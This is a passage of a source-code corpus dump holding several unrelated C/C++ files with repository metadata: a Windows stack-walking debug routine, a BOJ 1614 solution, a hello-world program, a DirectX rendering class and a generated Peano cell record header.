FreeLibrary(hToolhelp); return false; } keepGoing = !!pM32F( hSnap, &me ); while (keepGoing) { e.imageName = me.szExePath; e.moduleName = me.szModule; e.baseAddress = (DWORD) me.modBaseAddr; e.size = me.modBaseSize; modules.Add( e ); keepGoing = !!pM32N( hSnap, &me ); } CloseHandle(hSnap); FreeLibrary(hToolhelp); return (modules.GetSize() != 0); } // GetModuleListTH32 // **************************************** PSAPI ************************ typedef struct _MODULEINFO { LPVOID lpBaseOfDll; DWORD SizeOfImage; LPVOID EntryPoint; } MODULEINFO, *LPMODULEINFO; static bool GetModuleListPSAPI(ModuleList &modules, DWORD pid, HANDLE hProcess, FILE *fLogFile) { // EnumProcessModules() typedef BOOL (__stdcall *tEPM)(HANDLE hProcess, HMODULE *lphModule, DWORD cb, LPDWORD lpcbNeeded ); // GetModuleFileNameEx() typedef DWORD (__stdcall *tGMFNE)(HANDLE hProcess, HMODULE hModule, LPSTR lpFilename, DWORD nSize ); // GetModuleBaseName() typedef DWORD (__stdcall *tGMBN)(HANDLE hProcess, HMODULE hModule, LPSTR lpFilename, DWORD nSize ); // GetModuleInformation() typedef BOOL (__stdcall *tGMI)(HANDLE hProcess, HMODULE hModule, LPMODULEINFO pmi, DWORD nSize ); HINSTANCE hPsapi=NULL; tEPM pEPM; tGMFNE pGMFNE; tGMBN pGMBN; tGMI pGMI; DWORD i; ModuleEntry e; DWORD cbNeeded; MODULEINFO mi; HMODULE *hMods = 0; //char *tt = 0; hPsapi = LoadLibrary( _T("psapi.dll") ); if ( hPsapi == 0 ) goto cleanup; modules.RemoveAll(); pEPM = (tEPM) GetProcAddress( hPsapi, "EnumProcessModules" ); pGMFNE = (tGMFNE) GetProcAddress( hPsapi, "GetModuleFileNameExA" ); pGMBN = (tGMFNE) GetProcAddress( hPsapi, "GetModuleBaseNameA" ); pGMI = (tGMI) GetProcAddress( hPsapi, "GetModuleInformation" ); if ( pEPM == 0 || pGMFNE == 0 || pGMBN == 0 || pGMI == 0 ) { // we couldnīt find all functions //FreeLibrary( hPsapi ); //return false; goto cleanup; } hMods = (HMODULE*) My_malloc(sizeof(HMODULE) * (TTBUFLEN / sizeof HMODULE)); //tt = (char*) malloc(sizeof(char) * TTBUFLEN); if ( ! pEPM( hProcess, hMods, TTBUFLEN, &cbNeeded ) ) { _ftprintf(fLogFile, _T("EPM failed, GetLastError = %lu\n"), gle ); goto cleanup; } if ( cbNeeded > TTBUFLEN ) { _ftprintf(fLogFile, _T("More than %lu module handles. Huh?\n"), lenof( hMods ) ); goto cleanup; } for ( i = 0; i < cbNeeded / sizeof hMods[0]; i++ ) { // base address, size pGMI(hProcess, hMods[i], &mi, sizeof mi ); e.baseAddress = (DWORD) mi.lpBaseOfDll; e.size = mi.SizeOfImage; // image file name tt[0] = 0; pGMFNE(hProcess, hMods[i], tt, TTBUFLEN ); e.imageName = tt; // module name tt[0] = 0; pGMBN(hProcess, hMods[i], tt, TTBUFLEN ); e.moduleName = tt; modules.Add(e); } cleanup: if (hPsapi) FreeLibrary(hPsapi); //free(tt); if (hMods) My_free(hMods); return (modules.GetSize() != 0); } // GetModuleListPSAPI static bool GetModuleList(ModuleList& modules, DWORD pid, HANDLE hProcess, FILE *fLogFile) { // first try toolhelp32 if (GetModuleListTH32(modules, pid, fLogFile) ) return true; // then try psapi return GetModuleListPSAPI(modules, pid, hProcess, fLogFile); } // GetModuleList static void EnumAndLoadModuleSymbols( HANDLE hProcess, DWORD pid, FILE *fLogFile ) { static ModuleList modules; char *img, *mod; // fill in module list GetModuleList(modules, pid, hProcess, fLogFile); for ( int i=0; i < modules.GetSize(); i++ ) { // SymLoadModule() wants writeable strings img = strdup(modules[i].imageName); mod = strdup(modules[i].moduleName); pSLM( hProcess, 0, img, mod, modules[i].baseAddress, modules[i].size ); My_free(img); My_free(mod); //std::string s; } } // EnumAndLoadModuleSymbols void ShowStack(FILE *fLogFile) { CONTEXT c; memset( &c, '\0', sizeof c ); c.ContextFlags = CONTEXT_FULL; HANDLE hThread = NULL; if (DuplicateHandle( GetCurrentProcess(), GetCurrentThread(), GetCurrentProcess(), &hThread, 0, false, DUPLICATE_SAME_ACCESS ) == 0) { return; } // init CONTEXT record so we know where to start the stackwalk if ( GetThreadContext( hThread, &c ) == 0) { CloseHandle(hThread); return; } HANDLE hSWProcess = GetCurrentProcess(); // normally, call ImageNtHeader() and use machine info from PE header DWORD imageType = IMAGE_FILE_MACHINE_I386; HANDLE hProcess = GetCurrentProcess(); // hProcess normally comes from outside int frameNum; // counts walked frames DWORD offsetFromSymbol; // tells us how far from the symbol we were DWORD offsetFromLine; // tells us how far from the line we were DWORD symOptions; // symbol handler settings char undName[MAXNAMELEN]; // undecorated name char undFullName[MAXNAMELEN]; // undecorated name with all shenanigans IMAGEHLP_MODULE Module; IMAGEHLP_LINE Line; BOOL bXMLTagWrote; CString symSearchPath; static BOOL bFirstTime = TRUE; // If no logfile is present, outpur to "stdout" if (fLogFile == NULL) { fLogFile = stdout; } fprintf(fLogFile, "STACK TRACE:\n"); STACKFRAME s; // in/out stackframe memset( &s, '\0', sizeof s ); if ( (g_bInitialized == FALSE) && (bFirstTime == TRUE) ) { InitStackWalk(); } if (g_bInitialized == FALSE) { // Could not init!!!! bFirstTime = FALSE; _ftprintf(fLogFile, _T("Stackwalker not initialized (or was not able to initialize)!\n")); CloseHandle(hThread); return; } // NOTE: normally, the exe directory and the current directory should be taken // from the target process. The current dir would be gotten through injection // of a remote thread; the exe fir through either ToolHelp32 or PSAPI. if (g_pSym == NULL) { g_pSym = (IMAGEHLP_SYMBOL *) My_malloc( IMGSYMLEN + MAXNAMELEN ); if (!g_pSym) goto cleanup; // not enough memory... } if (bFirstTime) { CHAR *p;//,tt[TTBUFLEN+1]; //tt = (CHAR*) malloc(sizeof(CHAR) * TTBUFLEN); // Get the temporary buffer //if (!tt) goto cleanup; // not enough memory... // build symbol search path from: symSearchPath = ""; // current directory if ( GetCurrentDirectoryA( TTBUFLEN, tt ) ) { CString tts(tt); symSearchPath += tts + ";" ; } // dir with executable if ( GetModuleFileNameA( 0, tt, TTBUFLEN ) ) { for ( p = tt + strlen( tt ) - 1; p >= tt; -- p ) { // locate the rightmost path separator if ( *p == '\\' || *p == '/' || *p == ':' ) break; } // if we found one, p is pointing at it; if not, tt only contains // an exe name (no path), and p points before its first byte if ( p != tt ) // path sep found? { if ( *p == ':' ) // we leave colons in place ++ p; *p = '\0'; // eliminate the exe name and last path sep CString tts(tt); symSearchPath += tts + ";"; } } // environment variable _NT_SYMBOL_PATH if ( GetEnvironmentVariableA( "_NT_SYMBOL_PATH", tt, TTBUFLEN ) ) { CString tts(tt); symSearchPath += tts + ";" ; } // environment variable _NT_ALTERNATE_SYMBOL_PATH if ( GetEnvironmentVariableA( "_NT_ALTERNATE_SYMBOL_PATH", tt, TTBUFLEN ) ) { CString tts(tt); symSearchPath += tts + ";" ; } // environment variable SYSTEMROOT if ( GetEnvironmentVariableA( "SYSTEMROOT", tt, TTBUFLEN ) ) { CString tts(tt); symSearchPath += tts + ";" ; } if ( symSearchPath.GetLength() > 0 ) // if we added anything, we have a trailing semicolon symSearchPath = symSearchPath.Left( symSearchPath.GetLength() - 1 ); // why oh why does SymInitialize() want a writeable string? strncpy( tt, symSearchPath, TTBUFLEN ); tt[TTBUFLEN - 1] = '\0'; // if strncpy() overruns, it doesn't add the null terminator // init symbol handler stuff (SymInitialize()) if ( ! pSI( hProcess, tt, false ) ) { _ftprintf(fLogFile, _T("SymInitialize(): GetLastError = %lu\n"), gle ); //if (tt) free( tt ); goto cleanup; } // SymGetOptions() symOptions = pSGO(); symOptions |= SYMOPT_LOAD_LINES; symOptions &= ~SYMOPT_UNDNAME; symOptions &= ~SYMOPT_DEFERRED_LOADS; pSSO( symOptions ); // SymSetOptions() // Enumerate modules and tell imagehlp.dll about them. // On NT, this is not necessary, but it won't hurt. EnumAndLoadModuleSymbols( hProcess, GetCurrentProcessId(), fLogFile ); //if (tt) free( tt ); } // bFirstTime = TRUE bFirstTime = FALSE; // init STACKFRAME for first call // Notes: AddrModeFlat is just an assumption. I hate VDM debugging. // Notes: will have to be #ifdef-ed for Alphas; MIPSes are dead anyway, // and good riddance. s.AddrPC.Offset = c.Eip; s.AddrPC.Mode = AddrModeFlat; s.AddrFrame.Offset = c.Ebp; s.AddrFrame.Mode = AddrModeFlat; memset( g_pSym, '\0', IMGSYMLEN + MAXNAMELEN ); g_pSym->SizeOfStruct = IMGSYMLEN; g_pSym->MaxNameLength = MAXNAMELEN; memset( &Line, '\0', sizeof Line ); Line.SizeOfStruct = sizeof Line; memset( &Module, '\0', sizeof Module ); Module.SizeOfStruct = sizeof Module; for ( frameNum=0; ; ++frameNum ) { // get next stack frame (StackWalk(), SymFunctionTableAccess(), SymGetModuleBase()) // if this returns ERROR_INVALID_ADDRESS (487) or ERROR_NOACCESS (998), you can // assume that either you are done, or that the stack is so hosed that the next // deeper frame could not be found. // CONTEXT need not to be supplied if imageTyp is IMAGE_FILE_MACHINE_I386! if ( ! pSW( imageType, hSWProcess, hThread, &s, NULL, NULL, pSFTA, pSGMB, NULL ) ) break; if ( s.AddrPC.Offset == 0 ) { // Special case: If we are here, we have no valid callstack entry! _ftprintf(fLogFile, _T("(-nosymbols- PC == 0)\n")); } else { // we seem to have a valid PC bXMLTagWrote = FALSE; undName[0] = 0; undFullName[0] = 0; offsetFromSymbol = 0; // show procedure info (SymGetSymFromAddr()) if ( ! pSGSFA( hProcess, s.AddrPC.Offset, &offsetFromSymbol, g_pSym ) ) { } else { // UnDecorateSymbolName() pUDSN( g_pSym->Name, undName, MAXNAMELEN, UNDNAME_NAME_ONLY ); pUDSN( g_pSym->Name, undFullName, MAXNAMELEN, UNDNAME_COMPLETE ); } // show line number info, NT5.0-method (SymGetLineFromAddr()) offsetFromLine = 0; if ( pSGLFA != NULL ) { // yes, we have SymGetLineFromAddr() if ( ! pSGLFA( hProcess, s.AddrPC.Offset, &offsetFromLine, &Line ) ) { if ( (gle != 487) && (frameNum > 0) ) // ignore error for first frame { _ftprintf(fLogFile, _T("SymGetLineFromAddr(): GetLastError = %lu\n"), gle ); } } else { if (frameNum > 1) { fprintf(fLogFile, "\t%s(%lu) %s + %ld bytes\n", Line.FileName, Line.LineNumber, undName, offsetFromLine); } } } // yes, we have SymGetLineFromAddr() } // we seem to have a valid PC // no return address means no deeper stackframe if ( s.AddrReturn.Offset == 0 ) { // avoid misunderstandings in the printf() following the loop SetLastError( 0 ); break; } } // for ( frameNum ) if ( gle != 0 ) _ftprintf(fLogFile, _T("\nStackWalk(): GetLastError = %lu\n"), gle ); cleanup: if (fLogFile) { _ftprintf(fLogFile, _T("\n")); } if (hThread) CloseHandle(hThread); } // ShowStack
b9703b2c57f9e75f0a693990a6b6fa81cdca18f7
2b0b07242be5ea756aba992e171b43fbee9bfada
/BOJ/1614/1614.cpp
85c06689d9fff4bbc37d9fa54766bb914f09b97b
[]
no_license
newdaytrue/PS
28f138a5e8fd4024836ea7c2b6ce59bea91dbad7
afffef30fcb59f6abfee2d5b8f00a304e8d80c91
refs/heads/master
2020-03-22T13:01:46.555651
2018-02-13T18:25:34
2018-02-13T18:25:34
140,078,090
1
0
null
2018-07-07T11:21:44
2018-07-07T11:21:44
null
UTF-8
C++
false
false
821
cpp
// ===================================================================================== // // Filename: 1614.cpp // Created: 2017년 04월 23일 21시 38분 28초 // Compiler: g++ -O2 -std=c++14 // Author: baactree , [email protected] // Company: Chonnam National University // // ===================================================================================== #include <bits/stdc++.h> using namespace std; long long n, k; int main(){ scanf("%lld%lld", &n, &k); long long ans=0; if(n==1){ ans+=k*8; } else if(n==2){ ans++; if(k&1){ ans+=6; } k/=2; ans+=k*8; } else if(n==3){ ans+=2; ans+=k*4; } else if(n==4){ ans+=3; if(k&1) ans+=2; k/=2; ans+=k*8; } else if(n==5){ ans+=4; ans+=k*8; } printf("%lld\n", ans); return 0; }
e30b90b95ffd304a659831be01019d0f7c26170f
e338ceec47bdf340c51e96ee20a66e2b629e4565
/Visual Studio/Projects/University Project/ASH/ASH/first .cpp
eef18aa4e79e804b25e340aefc521b7a14cbe299
[ "MIT" ]
permissive
HaozheGuAsh/Undergraduate
da4071ea38cd36cc1fe3364489fe7247da40c748
2b75ef3ae06b6c2350edc4b0b03f516a194cca99
refs/heads/master
2021-01-20T13:44:53.290869
2018-03-18T23:43:01
2018-03-18T23:43:01
90,523,868
0
2
null
null
null
null
UTF-8
C++
false
false
219
cpp
/* my second program in C++ with more comments */ #include <iostream> int main1() { std::cout << "Hello World! "; // prints Hello World! std::cout << "I'm a C++ program"; // prints I'm a C++ program return 0; }
7d810aefc9040baf05434f9b3f3d45d74c2f6693
f177993b13e97f9fecfc0e751602153824dfef7e
/ImPro/ImProFilters/DXRender/DXRenderDisplay.cpp
b89f2ba7733f7c07d3c70d8291c93187c7e1ef34
[]
no_license
svn2github/imtophooksln
7bd7412947d6368ce394810f479ebab1557ef356
bacd7f29002135806d0f5047ae47cbad4c03f90e
refs/heads/master
2020-05-20T04:00:56.564124
2010-09-24T09:10:51
2010-09-24T09:10:51
11,787,598
1
0
null
null
null
null
UTF-8
C++
false
false
5,164
cpp
#include "StdAfx.h" #include "DXRenderDisplay.h" DXRenderDisplay::DXRenderDisplay(IDirect3D9* pD3D, UINT rtWidth, UINT rtHeight) : MS3DDisplay(pD3D, rtWidth, rtHeight) { HRESULT hr = S_OK; m_bDrawFPS = false; m_bFlipX = false; m_bFlipY = false; m_sampleType = 0; m_pD3DFont = NULL; hr = D3DXCreateFont(m_pDevice, 35, 0, FW_NORMAL, 0, FALSE, DEFAULT_CHARSET, OUT_DEFAULT_PRECIS, DEFAULT_QUALITY, DEFAULT_PITCH | FF_DONTCARE, L"System", &m_pD3DFont ); lasttime = timeGetTime(); currtime = timeGetTime(); count = 0; fps = 0; imgW = 0; imgH = 0; } DXRenderDisplay::DXRenderDisplay(IDirect3DDevice9* pDevice, UINT rtWidth, UINT rtHeight) : MS3DDisplay(pDevice, rtWidth, rtHeight) { HRESULT hr = S_OK; m_bDrawFPS = false; m_bFlipX = false; m_bFlipY = false; m_sampleType = 0; m_pD3DFont = NULL; hr = D3DXCreateFont(m_pDevice, 35, 0, FW_NORMAL, 0, FALSE, DEFAULT_CHARSET, OUT_DEFAULT_PRECIS, DEFAULT_QUALITY, DEFAULT_PITCH | FF_DONTCARE, L"System", &m_pD3DFont ); lasttime = timeGetTime(); currtime = timeGetTime(); count = 0; fps = 0; imgW = 0; imgH = 0; } DXRenderDisplay::~DXRenderDisplay(void) { if (m_pD3DFont != NULL) { m_pD3DFont->Release(); m_pD3DFont = NULL; } } BOOL DXRenderDisplay::Render() { CAutoLock lck(&m_csResetDevice); if (m_pDisplayPlane == NULL) { return FALSE; } HRESULT hr = S_OK; hr = m_pDevice->Clear( 0, NULL, D3DCLEAR_TARGET|D3DCLEAR_ZBUFFER, D3DCOLOR_XRGB(50,50,50), 1.0f, 0 ); m_pDevice->SetRenderState(D3DRS_ZENABLE, FALSE); ID3DXEffect* pEffect = GetEffect(); if (pEffect == NULL) { return FALSE; } m_pCamera->CameraOn(); UINT iPass, cPasses = 0; if( SUCCEEDED( m_pDevice->BeginScene() ) ) { hr = pEffect->SetTexture("g_Texture", m_pTexture); hr = pEffect->SetTechnique("technique0"); hr = pEffect->SetBool("bFlipX", m_bFlipX); hr = pEffect->SetBool("bFlipY", m_bFlipY); hr = pEffect->SetInt("g_sampleType", m_sampleType); hr = pEffect->Begin(&cPasses, 0); for (iPass = 0; iPass < cPasses; iPass++) { hr = pEffect->BeginPass(iPass); m_pDisplayPlane->Render(); hr = pEffect->EndPass(); } hr = pEffect->End(); if (m_bDrawFPS) { if (imgW == 0 && imgH == 0) { LPDIRECT3DSURFACE9 pBackBuffer = NULL; D3DSURFACE_DESC desc; m_pDevice->GetRenderTarget(0,&pBackBuffer); pBackBuffer->GetDesc(&desc); imgW = desc.Width; imgH = desc.Height; pBackBuffer->Release(); pBackBuffer = NULL; } count++; if (count%30 == 0) { currtime = timeGetTime(); float dt = max(1, currtime - lasttime) / 1000.0; fps = 30.0 / dt; count = 0; lasttime = currtime; } WCHAR str[MAX_PATH] = {0}; RECT rect; rect.left = 0.05*imgW; rect.right = rect.left + 0.1*imgW; rect.top = 0.05*imgH; rect.bottom = rect.top + 0.1*imgH; swprintf_s(str, MAX_PATH, L"FPS: %.1f", fps); if (m_pD3DFont != NULL) { hr = m_pD3DFont->DrawTextW(NULL, str, -1, &rect, DT_NOCLIP | DT_LEFT | DT_TOP, D3DXCOLOR( 1.0f, 0.0f, 0.0f, 1.0f )); } } hr = m_pDevice->EndScene(); } m_pDevice->Present(NULL,NULL,NULL,NULL); m_pCamera->CameraOff(); m_pDevice->SetRenderState(D3DRS_ZENABLE, TRUE); return TRUE; } BOOL DXRenderDisplay::Render(IDirect3DBaseTexture9* pTexture) { return FALSE; } BOOL DXRenderDisplay::Render(IDirect3DBaseTexture9* pTexture, ID3DXEffect* pEffect) { return FALSE; } ID3DXEffect* DXRenderDisplay::GetEffect() { if (m_pEffect == NULL) { extern HMODULE GetModule(); DWORD dwShaderFlags = D3DXFX_NOT_CLONEABLE ; D3DCAPS9 cap; m_pDevice->GetDeviceCaps(&cap); if (cap.PixelShaderVersion < D3DPS_VERSION(2,0)) { dwShaderFlags |= D3DXSHADER_FORCE_PS_SOFTWARE_NOOPT; } if (cap.VertexShaderVersion < D3DVS_VERSION(2,0)) { dwShaderFlags |= D3DXSHADER_FORCE_VS_SOFTWARE_NOOPT; } WCHAR str[MAX_PATH] = {0}; HMODULE module = GetModule(); GetModuleFileName(module, str, MAX_PATH); // Gets filename WCHAR* pszFile = wcsrchr(str, '\\'); pszFile++; // Moves on from \ // Get path WCHAR szPath[MAX_PATH] = L""; _tcsncat(szPath, str, pszFile - str); swprintf_s(str, MAX_PATH, L"%s\\..\\..\\fx\\DXRenderer.fx", szPath); HRESULT hr = D3DXCreateEffectFromFileW( m_pDevice, str, NULL, NULL, dwShaderFlags, NULL, &m_pEffect, NULL ); if (FAILED(hr)) { OutputDebugStringW(L"@@@@ D3DXCreateEffectFromFileW Failed in DXRenderDisplay::GetEffect()\n"); return NULL; } } return m_pEffect; } HRESULT DXRenderDisplay::OnBeforeResetDevice(IDirect3DDevice9 * pd3dDevice, void* pUserContext) { HRESULT hr = S_OK; if (m_pD3DFont != NULL) { hr = m_pD3DFont->OnLostDevice(); } return __super::OnBeforeResetDevice(pd3dDevice, pUserContext); } HRESULT DXRenderDisplay::OnAfterResetDevice(IDirect3DDevice9 * pd3dDevice, void* pUserContext) { HRESULT hr = S_OK; if (m_pD3DFont != NULL) { hr = m_pD3DFont->OnResetDevice(); } return __super::OnAfterResetDevice(pd3dDevice, pUserContext); }
[ "ndhumuscle@fa729b96-8d43-11de-b54f-137c5e29c83a" ]
ndhumuscle@fa729b96-8d43-11de-b54f-137c5e29c83a
8f3ba187595a604a35ecc08cc7ccadaa203b70d9
14bc50e8e15ddaa3864859ec620e3f58bfbf49cc
/src/peanoclaw/records/Cell.h
572c0c59016c595fd59f57cddb7a5fa650b06d8c
[ "BSD-3-Clause" ]
permissive
unterwegerK/peanoclaw
8b1181bdafe81a1364219cf29abc72721609463e
2d8b45727e3b26d824f8afc6a8772736176083af
refs/heads/master
2020-09-24T04:15:03.629158
2016-01-30T10:38:03
2016-01-30T10:38:03
null
0
0
null
null
null
null
UTF-8
C++
false
false
557,338
h
#ifndef _PEANOCLAW_RECORDS_CELL_H #define _PEANOCLAW_RECORDS_CELL_H #include "tarch/multicore/MulticoreDefinitions.h" #include "peano/utils/Globals.h" #include "tarch/compiler/CompilerSpecificSettings.h" #include "peano/utils/PeanoOptimisations.h" #ifdef Parallel #include "tarch/parallel/Node.h" #endif #ifdef Parallel #include <mpi.h> #endif #include "tarch/logging/Log.h" #include "tarch/la/Vector.h" #include <bitset> #include <complex> #include <string> #include <iostream> namespace peanoclaw { namespace records { class Cell; class CellPacked; } } #if !defined(Debug) && !defined(Parallel) && defined(SharedMemoryParallelisation) /** * @author This class is generated by DaStGen * DataStructureGenerator (DaStGen) * 2007-2009 Wolfgang Eckhardt * 2012 Tobias Weinzierl * * build date: 09-02-2014 14:40 * * @date 24/10/2015 20:24 */ class peanoclaw::records::Cell { public: typedef peanoclaw::records::CellPacked Packed; enum State { Leaf = 0, Refined = 1, Root = 2 }; struct PersistentRecords { int _cellDescriptionIndex; bool _isInside; State _state; #ifdef UseManualAlignment std::bitset<DIMENSIONS> _evenFlags __attribute__((aligned(VectorisationAlignment))); #else std::bitset<DIMENSIONS> _evenFlags; #endif #ifdef UseManualAlignment tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> _accessNumber __attribute__((aligned(VectorisationAlignment))); #else tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> _accessNumber; #endif int _numberOfLoadsFromInputStream; int _numberOfStoresToOutputStream; /** * Generated */ PersistentRecords(); /** * Generated */ PersistentRecords(const int& cellDescriptionIndex, const bool& isInside, const State& state, const std::bitset<DIMENSIONS>& evenFlags, const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber, const int& numberOfLoadsFromInputStream, const int& numberOfStoresToOutputStream); inline int getCellDescriptionIndex() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _cellDescriptionIndex; } inline void setCellDescriptionIndex(const int& cellDescriptionIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _cellDescriptionIndex = cellDescriptionIndex; } inline bool getIsInside() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _isInside; } inline void setIsInside(const bool& isInside) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _isInside = isInside; } inline State getState() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _state; } inline void setState(const State& state) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _state = state; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline std::bitset<DIMENSIONS> getEvenFlags() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _evenFlags; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setEvenFlags(const std::bitset<DIMENSIONS>& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _evenFlags = (evenFlags); } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> getAccessNumber() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _accessNumber; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setAccessNumber(const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _accessNumber = (accessNumber); } inline int getNumberOfLoadsFromInputStream() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _numberOfLoadsFromInputStream; } inline void setNumberOfLoadsFromInputStream(const int& numberOfLoadsFromInputStream) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _numberOfLoadsFromInputStream = numberOfLoadsFromInputStream; } inline int getNumberOfStoresToOutputStream() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _numberOfStoresToOutputStream; } inline void setNumberOfStoresToOutputStream(const int& numberOfStoresToOutputStream) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _numberOfStoresToOutputStream = numberOfStoresToOutputStream; } }; private: PersistentRecords _persistentRecords; public: /** * Generated */ Cell(); /** * Generated */ Cell(const PersistentRecords& persistentRecords); /** * Generated */ Cell(const int& cellDescriptionIndex, const bool& isInside, const State& state, const std::bitset<DIMENSIONS>& evenFlags, const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber, const int& numberOfLoadsFromInputStream, const int& numberOfStoresToOutputStream); /** * Generated */ virtual ~Cell(); inline int getCellDescriptionIndex() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._cellDescriptionIndex; } inline void setCellDescriptionIndex(const int& cellDescriptionIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._cellDescriptionIndex = cellDescriptionIndex; } inline bool getIsInside() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._isInside; } inline void setIsInside(const bool& isInside) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._isInside = isInside; } inline State getState() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._state; } inline void setState(const State& state) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._state = state; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline std::bitset<DIMENSIONS> getEvenFlags() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._evenFlags; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setEvenFlags(const std::bitset<DIMENSIONS>& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._evenFlags = (evenFlags); } inline bool getEvenFlags(int elementIndex) const #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); return _persistentRecords._evenFlags[elementIndex]; } inline void setEvenFlags(int elementIndex, const bool& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); _persistentRecords._evenFlags[elementIndex]= evenFlags; } inline void flipEvenFlags(int elementIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); _persistentRecords._evenFlags.flip(elementIndex); } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> getAccessNumber() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._accessNumber; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setAccessNumber(const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._accessNumber = (accessNumber); } inline short int getAccessNumber(int elementIndex) const #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS_TIMES_TWO); return _persistentRecords._accessNumber[elementIndex]; } inline void setAccessNumber(int elementIndex, const short int& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS_TIMES_TWO); _persistentRecords._accessNumber[elementIndex]= accessNumber; } inline int getNumberOfLoadsFromInputStream() const #ifdef UseManualInlining 